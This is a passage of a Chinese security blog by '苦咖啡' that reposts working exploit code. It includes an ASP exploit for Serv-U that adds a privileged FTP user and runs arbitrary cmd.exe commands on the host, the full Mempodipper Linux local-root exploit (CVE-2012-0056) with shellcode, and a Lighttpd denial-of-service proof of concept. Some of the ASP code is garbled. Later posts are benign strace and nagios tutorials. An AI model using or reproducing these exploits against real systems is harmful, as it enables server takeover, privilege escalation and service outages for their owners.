苦咖啡-网络安全爱好者-我不在乎自己有多少伤痕累累，我只在乎今后你让谁陪

serv-u 最新通杀所有版本 EXP

voilet119@163.com(苦咖啡) — Thu,02 Feb 2012 09:37:02 +0800

<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
    '----------自定义参数开始-----------

action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
organizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")

    '----------自定义参数结束-----------

select case action

case 1
   returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","","")
   sessionid=getmidstr("","",returns)
   if sessionid<>"" then
   Response.Write "login ok!"&"
"
   Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
   else
   Response.Write "error!"&"
"
   end if

case 2
   call main2()

case 3
   returns=httpopen("","POST",")
   organizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
   organizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
   if organizationId<>"" then
   Response.write "get organizationId "&OrganizationId&" ok!"&"
"
   Response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId
                else
   Response.write "error!"&"
"
   end if

case 4
   call main3()

case 5
   returns=httpopen("","POST",")
userid=getmidstr("",returns)    if userid<>"" then    Response.write "get userid "&userid&" ok!"&" "    Response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId&"&userid="&userid    else    Response.write "error!"    end if case 6    call main4() case 7    returns=httpopen("Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&","POST",")    returns=httpopen("LoginID="&user&"&FullName=&Password="&pass&"&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2FC%3A&HomeDir=%2F"&path&"&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&AlwaysAllowLogin=1&Description=&=&IncludeRespCodesInMsgFiles=&ComboSignOnMessageFilePath=&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&","POST",")    Response.write "add user ok!"&" "    Response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId case 8    call main5() case 9    returns=httpopen("DomainName="&mydomain&"&Description=test1&Enabled=1&EnableFTP=1&EnableFTPS=0&EnableSSH=0&EnableHTTP=0&EnableHTTPS=0&FTPPort="&ftpport&"&FTPSPort=990&SSHPort=22&HTTPPort=80&HTTPSPort=443&BindIPAddress=&","POST",")    domainid=getmidstr("","",returns)    Response.write "create domain ok!"&" "    Response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid case 10    call main6() case 11    set b=Server.CreateObject("Microsoft.XMLHTTP")    b.open "GET", "", false, "", ""    b.send "User " & user & vbCrLf & "pass "& pass & vbCrLf & "site exec c:\windows\system32\cmd.exe /c "& cmd & vbCrLf & "QUIT" & vbCrLf    Response.Write Replace(b.responseText,chr(13)," ")    Response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid case 12    call main7() case 13    returns=httpopen("IDs="&domainid&"&","POST",")    Response.Write "临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂."&" " case else    call main1() end select sub main1() %>                                                                              第一步:获取sessionid 管理端口: 管理员密码:      一般情况下不用改,如果管理员改了的话就填上去. <% end sub %> <% sub main2() %> &port=<%=port%>">                                   第二步:获取OrganizationId      这一步有点慢,请等待. <% end sub %> <% sub main3() %> &port=<%=port%>&OrganizationId=<%=OrganizationId%>">                                   第三步:获取userid      <% end sub %> <% sub main4() %> &port=<%=port%>&OrganizationId=<%=OrganizationId%>&userid=<%=userid%>">                                                                                                           第四步:加用户新ftp账号: 新ftp密码: 系统路径:      <% end sub %> <% sub main5() %> &userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>">                                                                                   第五步:创建域要添加的域: 域端口:      <% end sub %> <% sub main6() %> &userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">                                                                                                                                            执行命令 FTP账号: FTP密码: FTP端口: 你的语句:        注意:如果是serv-u 7.0,这里可以马上点提交. 注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交. <% end sub %> <% sub main7() %> &userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">                               删除临时域      <% end sub %>

仅供安全研究与教学之用,风险自负!

Linux 2.6.39 到 3.2.0 爆提权漏洞

voilet119@163.com(苦咖啡) — Sun,29 Jan 2012 14:30:33 +0800

Linux 2.6.39 到 3.2.0 内核爆提权漏洞，普通用户可以通过运行特定代码获得 root 权限。

复制内容到剪贴板程序代码

/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

char *prog_name;

int send_fd(int sock, int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int n;
    char cms[CMSG_SPACE(sizeof(int))];

    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}

int recv_fd(int sock)
{
    int n;
    int fd;
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    char cms[CMSG_SPACE(sizeof(int))];

    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof msg);
    msg.msg_name = 0;
    msg.msg_namelen = 0;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = sizeof cms;

    if ((n = recvmsg(sock, &msg, 0)) < 0)
        return -1;
    if (n == 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
    close(sock);
    return fd;
}

unsigned long ptrace_address()
{
    int fd[2];
    printf("[+] Creating ptrace pipe.\n");
    pipe2(fd, O_NONBLOCK);
    printf("[+] Forking ptrace child.\n");
    int child = fork();
    if (child) {
        close(fd[1]);
        char buf;
        printf("[+] Waiting for ptraced child to give output on syscalls.\n");
        for (;;) {
            wait(NULL);
            if (read(fd[0], &buf, 1) > 0)
                break;
            ptrace(PTRACE_SYSCALL, child, NULL, NULL);
        }

        printf("[+] Error message written. Single stepping to find address.\n");
        struct user_regs_struct regs;
        for (;;) {
            ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
            wait(NULL);
            ptrace(PTRACE_GETREGS, child, NULL, ®s);
#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
            if (instruction_pointer < upper_bound) {
                unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
                if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
                    return instruction_pointer;
            }
        }
    } else {
        printf("[+] Ptrace_traceme'ing process.\n");
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
            perror("[-] ptrace");
            return 0;
        }
        close(fd[0]);
        dup2(fd[1], 2);
        execl("/bin/su", "su", "not-a-valid-user", NULL);
    }
    return 0;
}

unsigned long objdump_address()
{
    FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\$[^0]*\$/0x\\1/'", "r");
    if (!command) {
        perror("[-] popen");
        return 0;
    }
    char result[32];
    fgets(result, 32, command);
    pclose(command);
    return strtoul(result, NULL, 16);
}

unsigned long find_address()
{
    printf("[+] Ptracing su to find next instruction without reading binary.\n");
    unsigned long address = ptrace_address();
    if (!address) {
        printf("[-] Ptrace failed.\n");
        printf("[+] Reading su binary with objdump to find exit@plt.\n");
        address = objdump_address();
        if (address == ULONG_MAX || !address) {
            printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
            printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
            exit(-1);
        }
    }
    printf("[+] Resolved call address to 0x%lx.\n", address);
    return address;
}

int su_padding()
{
    printf("[+] Calculating su padding.\n");
    FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
    if (!command) {
        perror("[-] popen");
        exit(1);
    }
    char result[256];
    fgets(result, 256, command);
    pclose(command);
    return strstr(result, "this-user-does-not-exist") - result;
}

int child(int sock)
{
    char parent_mem[256];
    sprintf(parent_mem, "/proc/%d/mem", getppid());
    printf("[+] Opening parent mem %s in child.\n", parent_mem);
    int fd = open(parent_mem, O_RDWR);
    if (fd < 0) {
        perror("[-] open");
        return 1;
    }
    printf("[+] Sending fd %d to parent.\n", fd);
    send_fd(sock, fd);
    return 0;
}

int parent(unsigned long address)
{
    int sockets[2];
    printf("[+] Opening socketpair.\n");
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
        perror("[-] socketpair");
        return 1;
    }
    if (fork()) {
        printf("[+] Waiting for transferred fd in parent.\n");
        int fd = recv_fd(sockets[1]);
        printf("[+] Received fd at %d.\n", fd);
        if (fd < 0) {
            perror("[-] recv_fd");
            return 1;
        }
        printf("[+] Assigning fd %d to stderr.\n", fd);
        dup2(2, 15);
        dup2(fd, 2);

        unsigned long offset = address - su_padding();
        printf("[+] Seeking to offset 0x%lx.\n", offset);
        lseek64(fd, offset, SEEK_SET);

#if defined(__i386__)
        // See shellcode-32.s in this package for the source.
        char shellcode[] =
            "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
            "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
            "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
            "\x80";
#elif defined(__x86_64__)
        // See shellcode-64.s in this package for the source.
        char shellcode[] =
            "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
            "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
            "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
            "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
            "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
        printf("[+] Executing su with shellcode.\n");
        execl("/bin/su", "su", shellcode, NULL);
    } else {
        char sock[32];
        sprintf(sock, "%d", sockets[0]);
        printf("[+] Executing child from child fork.\n");
        execl("/proc/self/exe", prog_name, "-c", sock, NULL);
    }
    return 0;
}

int main(int argc, char **argv)
{
    prog_name = argv[0];

    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
        return child(atoi(argv[2]));

    printf("===============================\n");
    printf("=          Mempodipper        =\n");
    printf("=           by zx2c4          =\n");
    printf("=         Jan 21, 2012        =\n");
    printf("===============================\n\n");

    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
        return parent(strtoul(argv[2], NULL, 16));
    else
        return parent(find_address());

}

Lighttpd 1.4.30 / 1.5 Denial Of Servicevoilet119@163.com(苦咖啡) — Tue,27 Dec 2011 11:43:52 +0800
攻击代码如下：
 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
#define PORT 80
#define SA struct sockaddr
 
char header[] =
"GET /%s/ HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Proxy-Connection: keep-alive\r\n"
"Authorization: Basic ";
 
char header_port[] =
"GET /%s/ HTTP/1.1\r\n"
"Host: %s:%d\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Proxy-Connection: keep-alive\r\n"
"Authorization: Basic ";
 
 
int main(int argc, char *argv[]) {
 
   int i=PORT,opt=0,sockfd;
   char *remote_dir = NULL;
   char *r_hostname = NULL;
   struct sockaddr_in servaddr;
   struct hostent *h = NULL;
   char *buf;
   unsigned int len = 0x0;
 
 
   if (!argv[1])
      usage(argv[0]);
 
 
   printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
   printf("\n\t\t[+] Preparing arguments... ");
   while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {
      switch(opt) {
 
       case 'h':
 
         r_hostname = strdup(optarg);
         if ( (h = gethostbyname(r_hostname))==NULL) {
             printf("Gethostbyname() field!\n");
             exit(-1);
         }
         break;
 
       case 'p':
 
             i=atoi(optarg);
         break;
 
       case 'd':
 
             remote_dir = strdup(optarg);
         break;
 
       case '?':
 
             usage(argv[0]);
         break;
 
       default:
 
             usage(argv[0]);
         break;
 
      }
   }
 
   if (!remote_dir || !h) {
      usage(argv[0]);
      exit(-1);
   }
 
   servaddr.sin_family      = AF_INET;
   servaddr.sin_port        = htons(i);
   servaddr.sin_addr        = *(struct in_addr*)h->h_addr;
 
   len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;
   if ( (buf = (char *)malloc(len)) == NULL) {
      printf("malloc() :(\n");
      exit(-1);
   }
   memset(buf,0x0,len);
 
   if (i != 80)
      snprintf(buf,len,header_port,remote_dir,r_hostname,i);
   else
      snprintf(buf,len,header,remote_dir,r_hostname);
 
   for (i=0;i<130;i++)
      buf[strlen(buf)] = 127+i;
 
   buf[strlen(buf)] = '\r';
   buf[strlen(buf)] = '\n';
   buf[strlen(buf)] = '\r';
   buf[strlen(buf)] = '\n';
 
   printf("OK\n\t\t[+] Creating socket... ");
   if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {
      printf("Socket() error!\n");
      exit(-1);
   }
 
   printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname);
   if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {
      printf("Connect() error!\n");
      exit(-1);
   }
 
   printf("OK\n\t\t[+] Sending dirty packet... ");
//   write(1,buf,strlen(buf));
   write(sockfd,buf,strlen(buf));
 
   printf("OK\n\n\t\t[+] Check the website!\n\n");
 
   close(sockfd);
 
}
 
int usage(char *arg) {
 
      printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
	  printf("\n\t*** [ blog http://www.kukafei520.net ]");
	  printf("\n\t*** [ E-mail voilet119@163.com ]");
      printf("\n\tUsage: %s \n\n\t\tOptions:\n",arg);
      printf("\t\t\t -v \n\t\t\t -p \n\t\t\t -d \n\n");
      exit(0);
} 
 

nagios配置文件生成器nconf

voilet119@163.com(苦咖啡) — Tue,13 Dec 2011 13:34:58 +0800

可能很多新手在配置nagios的时候对其配置文件感到头痛，现在有了好的办法去解决，就是用nconf来生成配置文件，话不多说，看具体操作方法

下载完文件后，直接解压缩，配置好数据库用户名及密码，配置好nginx或是apache，本文使用nginx配置其虚拟主机

直接访问地址http://127.0.0.1

按提示进行安装，安装完成后需要删除INSTALL INSTALL.php Update Update.php这几个目录及文件，否则无法跳转到安装成功的界面

以下为nconf的截图

strace使用讲解【原创】

voilet119@163.com(苦咖啡) — Wed,30 Nov 2011 10:10:24 +0800

由于最近的一些业务在linux系统上高并发的情况下发生了很多问题，最终都是使用strace跟踪找到了问题所在，便整理了一份strace的使用方法和详解，也拿出来给大家分享一下

功能说明：

strace 命令是一种强大的工具, 能够显示任何由用户空间程式发出的系统调用. strace 显示这些调用的参数并返回符号形式的值. strace 从内核接收信息, 而且无需以任何特别的方式来构建内核. strace 的每一行输出包括系统调用名称, 然后是参数和返回值.
下面记录几个常用option:
-f -F选项告诉strace同时跟踪fork和vfork出来的进程
-o xxx.txt 输出到某个文档.
-e execve 只记录 execve 这类系统调用.

实例说明：

配置php将其开户一个进程，方便每次都能跟踪到数据，如开户多个将刷新多次才可能分配到你监听的进程上
用以下php来做一个示例保存为test2.php(因facebook在国空被gfw，所以请求肯定会超时，特拿来做试验)
$a = exec("curl -I www.facebook.com",$out,$status);
print_r($a);
print_r($out);
print_r($status);
?>

使用curl请求地址或是通过ie请求
Curl –I http://100.100.100.6/test2.php
在服务端监听其端口(可使用ps –auxf|grep php-fpm)来确定其进程号
Strace –p 32448（也可使用strace –T –p 32448看每个执行的时间）

如果执行请求后，可看在上图看到php当执行到
$a = exec("curl -I www.facebook.com",$out,$status);
时开始等待返回，25秒左右后才返回结果
另一种测试方法，也可以直接用php去执行跟踪
Strace /usr/bin/php test2.php

以上图可看到，程序也是在执行
exec("curl -I www.facebook.com",$out,$status);的时候开始等待返回，耗费21秒时间

Strace还可以跟踪服务启动过程，帮我们解决一些服务在启动过程中遇到的问题，以下以nginx配置错误为例
以下是不存在/log根目录的、我们来跟踪启动看是什么效果

Strace /usr/local/nginx/sbin/nginx
以下是其返回结果，也可以看到提示目录有误

Strace在跟踪时返回0则程序执行正常，如返回其它数字则会继续查找，直到所有默认文件或是设置都不存在时才会报错

详细参数说明：

-c 统计每一系统调用的所执行的时间,次数和出错的次数等.
-d 输出strace关于标准错误的调试信息.
-f 跟踪由fork调用所产生的子进程.
-ff 如果提供-o filename,则所有进程的跟踪结果输出到相应的filename.pid中,pid是各进程的进程号.
-F 尝试跟踪vfork调用.在-f时,vfork不被跟踪.
-h 输出简要的帮助信息.
-i 输出系统调用的入口指针.
-q 禁止输出关于脱离的消息.
-r 打印出相对时间关于每一个系统调用.
-t 在输出中的每一行前加上时间信息.
-tt 在输出中的每一行前加上时间信息,微秒级.
-ttt 微秒级输出,以秒了表示时间.
-T 显示每一调用所耗的时间.
-v 输出所有的系统调用.一些调用关于环境变量,状态,输入输出等调用由于使用频繁,默认不输出.
-V 输出strace的版本信息.
-x 以十六进制形式输出非标准字符串.
-xx 所有字符串以十六进制形式输出.
-a column 设置返回值的输出位置.默认为40.
-e expr 指定一个表达式,用来控制如何跟踪.格式如下:
[qualifier=][!]value1[,value2]...
qualifier只能是 trace,abbrev,verbose,raw,signal,read,write其中之一.value是用来限定的符号或数字.默认的 qualifier是 trace.感叹号是否定符号.例如-eopen等价于 -e trace=open,表示只跟踪open调用.而-etrace!=open表示跟踪除了open以外的其它调用.有两个特殊的符号 all 和 none. 注意有些shell使用!来执行历史记录里的命令,所以要使用\\.
-e trace=set 只跟踪指定的系统调用.例如:-e trace=open,close,rean,write表示只跟踪这四个系统调用.默认的为set=all.
-e trace=file 只跟踪有关文件操作的系统调用.
-e trace=process 只跟踪有关进程控制的系统调用.
-e trace=network 跟踪与网络有关的所有系统调用.
-e strace=signal 跟踪所有与系统信号有关的系统调用.
-e trace=ipc 跟踪所有与进程通讯有关的系统调用.
-e abbrev=set 设定strace输出的系统调用的结果集.-v 等与 abbrev=none.默认为abbrev=all.
-e raw=set 将指定的系统调用的参数以十六进制显示.
-e signal=set 指定跟踪的系统信号.默认为all.如 signal=!SIGIO(或者signal=!io),表示不跟踪SIGIO信号.
-e read=set 输出从指定文件中读出的数据.例如-e read=3,5
-e write=set 输出写入到指定文件中的数据.
-o filename 将strace的输出写入文件filename
-p pid 跟踪指定的进程pid.
-s strsize 指定输出的字符串的最大长度.默认为32.文件名一直全部输出.
-u username 以username 的UID和GID执行被跟踪的命令.

br/>
功能说明：

strace 命令是一种强大的工具, 能够显示任何由用户空间程式发出的系统调用. strace 显示这些调用的参数并返回符号形式的值. strace 从内核接收信息, 而且无需以任何特别的方式来构建内核. strace 的每一行输出包括系统调用名称, 然后是参数和返回值.
下面记录几个常用option:
-f -F选项告诉strace同时跟踪fork和vfork出来的进程
-o xxx.txt 输出到某个文档.
-e execve 只记录 execve 这类系统调用.

实例说明：

配置php将其开户一个进程，方便每次都能跟踪到数据，如开户多个将刷新多次才可能分配到你监听的进程上
用以下php来做一个示例保存为test2.php(因facebook在国空被gfw，所以请求肯定会超时，特拿来做试验)
$a = exec("curl -I www.facebook.com",$out,$status);
print_r($a);
print_r($out);
print_r($status);
?>

使用curl请求地址或是通过ie请求
Curl –I http://100.100.100.6/test2.php
在服务端监听其端口(可使用ps –auxf|grep php-fpm)来确定其进程号
Strace –p 32448（也可使用strace –T –p 32448看每个执行的时间）

如果执行请求后，可看在上图看到php当执行到
$a = exec("curl -I www.facebook.com",$out,$status);
时开始等待返回，25秒左右后才返回结果
另一种测试方法，也可以直接用php去执行跟踪
Strace /usr/bin/php test2.php

以上图可看到，程序也是在执行
exec("curl -I www.facebook.com",$out,$status);的时候开始等待返回，耗费21秒时间

Strace还可以跟踪服务启动过程，帮我们解决一些服务在启动过程中遇到的问题，以下以nginx配置错误为例
以下是不存在/log根目录的、我们来跟踪启动看是什么效果

Strace /usr/local/nginx/sbin/nginx
以下是其返回结果，也可以看到提示目录有误

Strace在跟踪时返回0则程序执行正常，如返回其它数字则会继续查找，直到所有默认文件或是设置都不存在时才会报错

详细参数说明：

-c 统计每一系统调用的所执行的时间,次数和出错的次数等.
-d 输出strace关于标准错误的调试信息.
-f 跟踪由fork调用所产生的子进程.
-ff 如果提供-o filename,则所有进程的跟踪结果输出到相应的filename.pid中,pid是各进程的进程号.
-F 尝试跟踪vfork调用.在-f时,vfork不被跟踪.
-h 输出简要的帮助信息.
-i 输出系统调用的入口指针.
-q 禁止输出关于脱离的消息.
-r 打印出相对时间关于每一个系统调用.
-t 在输出中的每一行前加上时间信息.
-tt 在输出中的每一行前加上时间信息,微秒级.
-ttt 微秒级输出,以秒了表示时间.
-T 显示每一调用所耗的时间.
-v 输出所有的系统调用.一些调用关于环境变量,状态,输入输出等调用由于使用频繁,默认不输出.
-V 输出strace的版本信息.
-x 以十六进制形式输出非标准字符串.
-xx 所有字符串以十六进制形式输出.
-a column 设置返回值的输出位置.默认为40.
-e expr 指定一个表达式,用来控制如何跟踪.格式如下:
[qualifier=][!]value1[,value2]...
qualifier只能是 trace,abbrev,verbose,raw,signal,read,write其中之一.value是用来限定的符号或数字.默认的 qualifier是 trace.感叹号是否定符号.例如-eopen等价于 -e trace=open,表示只跟踪open调用.而-etrace!=open表示跟踪除了open以外的其它调用.有两个特殊的符号 all 和 none. 注意有些shell使用!来执行历史记录里的命令,所以要使用\\.
-e trace=set 只跟踪指定的系统调用.例如:-e trace=open,close,rean,write表示只跟踪这四个系统调用.默认的为set=all.
-e trace=file 只跟踪有关文件操作的系统调用.
-e trace=process 只跟踪有关进程控制的系统调用.
-e trace=network 跟踪与网络有关的所有系统调用.
-e strace=signal 跟踪所有与系统信号有关的系统调用.
-e trace=ipc 跟踪所有与进程通讯有关的系统调用.
-e abbrev=set 设定strace输出的系统调用的结果集.-v 等与 abbrev=none.默认为abbrev=all.
-e raw=set 将指定的系统调用的参数以十六进制显示.
-e signal=set 指定跟踪的系统信号.默认为all.如 signal=!SIGIO(或者signal=!io),表示不跟踪SIGIO信号.
-e read=set 输出从指定文件中读出的数据.例如-e read=3,5
-e write=set 输出写入到指定文件中的数据.
-o filename 将strace的输出写入文件filename
-p pid 跟踪指定的进程pid.
-s strsize 指定输出的字符串的最大长度.默认为32.文件名一直全部输出.
-u username 以username 的UID和GID执行被跟踪的命令.

原创
转载请注明出处:http://www.kukafei520.net/blog

排查php内部错误500

voilet119@163.com(苦咖啡) — Thu,17 Nov 2011 15:11:20 +0800

早上上班第一件事就是看邮件，发现game、shop、pay全部报500错误，这个不是一件小事，增值业务是公司赢利的命脉，第一件事打电话给相关同事，随后登上服务器查看服务器当前情况，负载，CPU等使用都很低，为何还报服务器内部错误，重启服务，发现正常，两分钟后又报500，top下找到一个CPU使用最高的php进程记录下进程号

使用strace -p "进程号"就开始进程跟踪了，一会就显示完跟踪结果，结果如下：

poll([{fd=8, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
setsockopt(8, SOL_SOCKET, SO_SNDTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
write(8, "\37\0\0\0\3select get_Lock(114180,1) n"..., 35) = 35
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
read(8, "\1\0\0\1\1\32\0\0\2\3def\0\0\0\4name\0\f?\0\1\0\0\0\10\200\0"..., 16384) = 59
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
poll([{fd=8, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
setsockopt(8, SOL_SOCKET, SO_SNDTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
write(8, "\337\1\0\0\3update fs_user_account a, f"..., 483) = 483
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
read(8, "0\0\0\1\0\0\0\2\0\0\0(Rows matched: 0 Cha"..., 16384) = 52
poll([{fd=8, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
setsockopt(8, SOL_SOCKET, SO_SNDTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
write(8, "\34\0\0\0\3select RELEASE_LOCK(114180)", 32) = 32
setsockopt(8, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0\0\0\0\0\0\0\0\0", 16) = 0
